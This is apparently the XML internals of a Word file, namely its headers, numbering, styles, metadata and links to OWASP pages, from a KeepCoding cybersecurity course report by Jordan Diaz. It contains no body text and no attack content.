  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F11BF1D" w14:textId="77777777" w:rsidR="00F36949" w:rsidRDefault="00F36949" w:rsidP="006266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72B81" w14:textId="77777777" w:rsidR="00F36949" w:rsidRDefault="00F36949" w:rsidP="006266EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="56B42B3B" w14:textId="77777777" w:rsidR="00F36949" w:rsidRDefault="00F36949" w:rsidP="006266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70244" w14:textId="13B12ED4" w:rsidR="006266EC" w:rsidRPr="006E5B01" w:rsidRDefault="00F36949">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:alias w:val="Título"/>
        <w:tag w:val=""/>
        <w:id w:val="1116400235"/>
        <w:placeholder>
          <w:docPart w:val="DE9C7CD30C7F42459353A649BF1B3A33"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="006266EC" w:rsidRPr="006E5B01">
          <w:rPr>
            <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Presentado por J</w:t>
        </w:r>
        <w:r w:rsidR="006E5B01" w:rsidRPr="006E5B01">
          <w:rPr>
            <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ordan Diaz</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w14:paraId="0F5E25F4" w14:textId="200F9EBA" w:rsidR="006E5B01" w:rsidRPr="006E5B01" w:rsidRDefault="006E5B01">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="006E5B01">
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>KeepCoding Ciberseguridad9</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="51D569EF" w14:textId="4B8442E4" w:rsidR="006266EC" w:rsidRDefault="006266E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35CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA2C5D7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074501E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="467A455C"/>
    <w:lvl w:ilvl="0" w:tplc="544C7880">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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0959471C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBA829E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0B167BA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA2E628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0D4000A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D7C487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14E84E45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4DC4A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7D5075A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="824AB9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BEE361F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="190406C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254F0823"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7CAAC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BF80D2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EA8C4B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F8D7E17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F26007E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788107F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5D8D2C8"/>
    <w:lvl w:ilvl="0" w:tplc="E682953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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3901229B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCC64F58"/>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3862A8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF12B4CE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>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4647C26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D462B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9A21B6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DAA850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A75386C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDA6B57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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D0B6398"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5D8D2C8"/>
    <w:lvl w:ilvl="0" w:tplc="E682953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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50BE5EA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A82CD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1BD0278"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BEEA468"/>
    <w:lvl w:ilvl="0" w:tplc="91227028">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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58AB5E54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD5C732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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="606005D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5D8D2C8"/>
    <w:lvl w:ilvl="0" w:tplc="E682953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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="62F04DFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB1691D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86E0D91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01184F6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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CF36D2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5D8D2C8"/>
    <w:lvl w:ilvl="0" w:tplc="E682953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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E2604C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDDEEA2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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EA75551"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28B2B18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1504C57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3D0F2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77D59BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBFE29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4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="10"/>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C34"/>
    <w:rsid w:val="00027DC2"/>
    <w:rsid w:val="0008732D"/>
    <w:rsid w:val="00087D1C"/>
    <w:rsid w:val="000A7260"/>
    <w:rsid w:val="000A7673"/>
    <w:rsid w:val="000E209E"/>
    <w:rsid w:val="00103C01"/>
    <w:rsid w:val="00106799"/>
    <w:rsid w:val="00192B87"/>
    <w:rsid w:val="001A0E00"/>
    <w:rsid w:val="001A65C0"/>
    <w:rsid w:val="001A6F1A"/>
    <w:rsid w:val="001C22CB"/>
    <w:rsid w:val="001C2992"/>
    <w:rsid w:val="001D3F75"/>
    <w:rsid w:val="001E06D8"/>
    <w:rsid w:val="001F4F55"/>
    <w:rsid w:val="002059C6"/>
    <w:rsid w:val="00207D4B"/>
    <w:rsid w:val="00236C10"/>
    <w:rsid w:val="002517BA"/>
    <w:rsid w:val="0026103B"/>
    <w:rsid w:val="00275887"/>
    <w:rsid w:val="002F6D72"/>
    <w:rsid w:val="00300F0A"/>
    <w:rsid w:val="0030706A"/>
    <w:rsid w:val="0031641F"/>
    <w:rsid w:val="003563E4"/>
    <w:rsid w:val="003617F5"/>
    <w:rsid w:val="00387044"/>
    <w:rsid w:val="0039383E"/>
    <w:rsid w:val="003A53FC"/>
    <w:rsid w:val="003D04A9"/>
    <w:rsid w:val="003E70C3"/>
    <w:rsid w:val="004045C5"/>
    <w:rsid w:val="0042071E"/>
    <w:rsid w:val="00434863"/>
    <w:rsid w:val="00486F68"/>
    <w:rsid w:val="004D0CF3"/>
    <w:rsid w:val="004D766B"/>
    <w:rsid w:val="005218CA"/>
    <w:rsid w:val="005B2A9A"/>
    <w:rsid w:val="005C32C6"/>
    <w:rsid w:val="005E77D1"/>
    <w:rsid w:val="005F2C13"/>
    <w:rsid w:val="00604B70"/>
    <w:rsid w:val="00617AD3"/>
    <w:rsid w:val="006266EC"/>
    <w:rsid w:val="0064174A"/>
    <w:rsid w:val="00655C40"/>
    <w:rsid w:val="00661EBB"/>
    <w:rsid w:val="00667A64"/>
    <w:rsid w:val="00682D1E"/>
    <w:rsid w:val="006948DD"/>
    <w:rsid w:val="006B288C"/>
    <w:rsid w:val="006C6CD2"/>
    <w:rsid w:val="006E5B01"/>
    <w:rsid w:val="006F2E30"/>
    <w:rsid w:val="00717B6F"/>
    <w:rsid w:val="00776770"/>
    <w:rsid w:val="007930F0"/>
    <w:rsid w:val="007C1124"/>
    <w:rsid w:val="007C672B"/>
    <w:rsid w:val="007E2074"/>
    <w:rsid w:val="007E6879"/>
    <w:rsid w:val="007F02BD"/>
    <w:rsid w:val="00804DF0"/>
    <w:rsid w:val="00837E64"/>
    <w:rsid w:val="00847FD8"/>
    <w:rsid w:val="00856616"/>
    <w:rsid w:val="00860C84"/>
    <w:rsid w:val="00891E36"/>
    <w:rsid w:val="0090075F"/>
    <w:rsid w:val="009022FF"/>
    <w:rsid w:val="00934311"/>
    <w:rsid w:val="00934DF9"/>
    <w:rsid w:val="00992664"/>
    <w:rsid w:val="009B6A63"/>
    <w:rsid w:val="009E7F41"/>
    <w:rsid w:val="00A044B5"/>
    <w:rsid w:val="00A066EA"/>
    <w:rsid w:val="00A11BF3"/>
    <w:rsid w:val="00A27CEA"/>
    <w:rsid w:val="00A3117B"/>
    <w:rsid w:val="00A4681A"/>
    <w:rsid w:val="00A55541"/>
    <w:rsid w:val="00A57A77"/>
    <w:rsid w:val="00A6420D"/>
    <w:rsid w:val="00A8151B"/>
    <w:rsid w:val="00AB27B3"/>
    <w:rsid w:val="00AB315D"/>
    <w:rsid w:val="00AD056D"/>
    <w:rsid w:val="00AE237A"/>
    <w:rsid w:val="00B1581D"/>
    <w:rsid w:val="00BB1C31"/>
    <w:rsid w:val="00BB3132"/>
    <w:rsid w:val="00BD2BFF"/>
    <w:rsid w:val="00C1653A"/>
    <w:rsid w:val="00C22B5E"/>
    <w:rsid w:val="00C46D42"/>
    <w:rsid w:val="00C53419"/>
    <w:rsid w:val="00C6496F"/>
    <w:rsid w:val="00C722D8"/>
    <w:rsid w:val="00CF6770"/>
    <w:rsid w:val="00D04A28"/>
    <w:rsid w:val="00D22E17"/>
    <w:rsid w:val="00D362E6"/>
    <w:rsid w:val="00D87963"/>
    <w:rsid w:val="00D942CA"/>
    <w:rsid w:val="00DD38BC"/>
    <w:rsid w:val="00DF26BA"/>
    <w:rsid w:val="00E06100"/>
    <w:rsid w:val="00E118A0"/>
    <w:rsid w:val="00E20006"/>
    <w:rsid w:val="00E551EE"/>
    <w:rsid w:val="00E562D3"/>
    <w:rsid w:val="00E56A92"/>
    <w:rsid w:val="00E576EA"/>
    <w:rsid w:val="00E8726A"/>
    <w:rsid w:val="00EA1B01"/>
    <w:rsid w:val="00EB697F"/>
    <w:rsid w:val="00EB7874"/>
    <w:rsid w:val="00F133D1"/>
    <w:rsid w:val="00F32C34"/>
    <w:rsid w:val="00F36949"/>
    <w:rsid w:val="00F427E6"/>
    <w:rsid w:val="00F51014"/>
    <w:rsid w:val="00F779E2"/>
    <w:rsid w:val="00FC794F"/>
    <w:rsid w:val="00FE57B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63D5C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{53E550DD-BE71-4C2F-8A11-6BB7B58B5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66E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266E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266EC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006266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266EC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006E5B01"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00275887"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00275887"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculovisitado">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E551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83093">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="100860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owasp.org/www-project-webgoa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owasp.org/Top10/A07_2021-Identification_and_Authentication_Failure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owasp.org/www-community/attacks/SQL_Injec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owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/" TargetMode="External"/><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owasp.org/Top10/A05_2021-Security_Misconfigura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cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId3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9C7CD30C7F42459353A649BF1B3A33"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{ECED0981-D70D-4893-A2DE-E3F87FDE1B34}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="0077374B" w:rsidRDefault="001E37B1" w:rsidP="001E37B1">
          <w:pPr>
            <w:pStyle w:val="DE9C7CD30C7F42459353A649BF1B3A33"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="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7B1"/>
    <w:rsid w:val="001E37B1"/>
    <w:rsid w:val="0077374B"/>
    <w:rsid w:val="00B36959"/>
    <w:rsid w:val="00C91217"/>
    <w:rsid w:val="00DC60E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9C7CD30C7F42459353A649BF1B3A33">
    <w:name w:val="DE9C7CD30C7F42459353A649BF1B3A33"/>
    <w:rsid w:val="001E37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1543</TotalTime>
  <Pages>20</Pages>
  <Words>2631</Words>
  <Characters>17134</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>535</Lines>
  <Paragraphs>238</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Título</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Presentado por Jordan Diaz</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>19527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Presentado por Jordan Diaz</dc:title>
  <dc:subject/>
  <dc:creator>Jordan andres Diaz Sanchez</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jordan andres Diaz Sanchez</cp:lastModifiedBy>
  <cp:revision>106</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-06T21:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-08T02:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>